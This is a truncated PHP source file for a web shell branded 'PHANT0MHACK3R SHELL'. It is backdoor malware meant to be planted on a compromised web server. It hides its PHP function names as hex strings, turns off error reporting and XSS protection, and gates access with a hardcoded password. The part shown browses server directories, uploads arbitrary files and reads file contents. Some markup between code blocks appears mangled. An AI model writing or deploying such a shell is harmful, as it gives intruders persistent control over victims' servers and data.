# Konfigurasyon
$sayfaSifreleme = '1'; # 1 acik , 0 kapali
$kullaniciAdi = 'admin';
$sifre = 'phant0mhack3r';
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi, $sifre)
{
if (empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {
header('WWW-Authenticate: Basic realm="x"');
die(header('HTTP/1.0 401 Unauthorized'));
}
}
# Sayfa Sifreleme aciksa
if ($sayfaSifreleme == '1') {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi, $sifre);
}
header("X-XSS-Protection: 0");
ob_start();
set_time_limit(0);
error_reporting(0);
ini_set('display_errors', FALSE);
$Array = [
'7068705f756e616d65',
'70687076657273696f6e',
'6368646972',
'676574637764',
'707265675f73706c6974',
'636f7079',
'66696c655f6765745f636f6e74656e7473',
'6261736536345f6465636f6465',
'69735f646972',
'6f625f656e645f636c65616e28293b',
'756e6c696e6b',
'6d6b646972',
'63686d6f64',
'7363616e646972',
'7374725f7265706c616365',
'68746d6c7370656369616c6368617273',
'7661725f64756d70',
'666f70656e',
'667772697465',
'66636c6f7365',
'64617465',
'66696c656d74696d65',
'737562737472',
'737072696e7466',
'66696c657065726d73',
'746f756368',
'66696c655f657869737473',
'72656e616d65',
'69735f6172726179',
'69735f6f626a656374',
'737472706f73',
'69735f7772697461626c65',
'69735f7265616461626c65',
'737472746f74696d65',
'66696c6573697a65',
'726d646972',
'6f625f6765745f636c65616e',
'7265616466696c65',
'617373657274',
];
$___ = count($Array);
for ($i = 0; $i < $___; $i++) {
$GNJ[] = uhex($Array[$i]);
}
<!DOCTYPE html>
<html dir="auto" lang="en-US">
<meta charset="UTF-8">
<meta name="robots" content="NOINDEX, NOFOLLOW">
PHANT0MHACK3R <title>PHANT0MHACK3R</title>
<link rel="icon" href="https://c.top4top.io/p_2496i85ap1.png" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
<style type="text/css">
@charset "UTF-8";
@import url(https://cdn.anarchyKayze.wiki/noselect.css);
@import url(https://use.fontawesome.com/releases/v5.8.1/css/all.css);
@font-face {
font-family: i;
src: url(i.woff2) format('woff2'), url(i.woff) format('woff')
}
html {
margin-left: 1em;
margin-right: 1em;
margin-top: -1.5em;
background: #000 !important;
font-family: Courier;
}
.x {
text-align: center
}
.y {
font-family: i;
font-size: calc(2.3em + 2.3vw);
color: #48ff00
}
.y:hover {
color: #48ff00
}
.w {
color: #48ff00
}
.b {
color: #48ff00
}
.q {
margin-top: .5em
}
article {
margin-top: 1.5em;
font-size: .9em
}
.i {
float: left
}
.u {
float: right;
text-align: right;
margin-bottom: 1.5em
}
input[type=file] {
display: none
}
input[type=submit] {
border: 1px solid #48ff00;
padding: .2em;
background: #000
}
td {
color: #48ff00
}
th {
font-weight: 400;
border-bottom: thin solid #48ff00;
color: #48ff00
}
.et {
text-align: left;
color: #48ff00
}
.r:hover {
background: #0 0
}
.l {
border: 1px solid #48ff00;
padding: 1px;
background: 0 0
}
footer {
margin-top: 2em;
height: 2.2rem;
width: 100%;
font-size: .9em
}
footer:hover {
color: #48ff00
}
a {
text-decoration: none;
color: #ff0000
}
a:hover {
color: #48ff00
}
.m {
margin-left: 2.4em
}
textarea {
background: #48ff00 0;
border: none;
width: 70%;
height: 30em;
font-family: Courier;
font-size: .9em
}
textarea.o {
background: #48ff00
}
.h {
color: #48ff00
}
</style>
<header>
<div class="y x">
<a class="ajx" href=" echo basename($_SERVER['PHP_SELF']); ">
PHANT0MHACK3R SHELL
</a>
</div>
</header>
<article>
<div class="i">
<i class="far fa-hdd"></i>
echo $GNJ[0]();
<br />
<i class="far fa-lightbulb"></i>   SOFT :
echo $_SERVER['SERVER_SOFTWARE']; PHP :
echo $GNJ[1]();
<br />
<i class="far fa-folder"></i>
if (isset($_GET["d"])) {
$d = uhex($_GET["d"]);
$GNJ[2](uhex($_GET["d"]));
} else {
$d = $GNJ[3]();
}
$k = $GNJ[4]("/(\\\|\/)/", $d);
foreach ($k as $m => $l) {
if ($l == '' && $m == 0) {
echo '<a class="ajx" href="?d=2f">/</a>';
}
if ($l == '') {
continue;
}
echo '<a class="ajx" href="?d=';
for ($i = 0; $i <= $m; $i++) {
echo hex($k[$i]);
if ($i != $m) {
echo '2f';
}
}
echo '">' . $l . '</a>/';
}
<br />
</div>
<div class="u">
echo $_SERVER['SERVER_ADDR']; <i class="fas fa-link"></i>
<br />
<br />
$o_ = [
'<script>$.notify("',
'", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'
];
$f = $o_[0] . 'OK!' . $o_[1];
$g = $o_[0] . 'ER!' . $o_[1];
if (isset($_FILES["n"])) {
$z = $_FILES["n"]["name"];
$r = count($z);
for ($i = 0; $i < $r; $i++) {
if ($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
echo $f;
} else {
echo $g;
}
}
}
</div>
$a_ = '<table cellspacing="0" cellpadding="7" width="100%">
<thead>
<th>';
$b_ = '</th>
|
</thead>
<tbody>
|
<td class="x">';
$c_ = '
|
</tbody>
';
$d_ = '<br />
<br />
';
if (isset($_GET["s"])) {
echo $a_ . uhex($_GET["s"]) . $b_ . '
<textarea readonly="yes">' . $GNJ[15]($GNJ[6](uhex($_GET["s"]))) . '</textarea>
<br />
<br />
' . $c_;
} elseif (isset($_GET["y"])) {
echo $a_ . 'REQUEST' . $b_ . '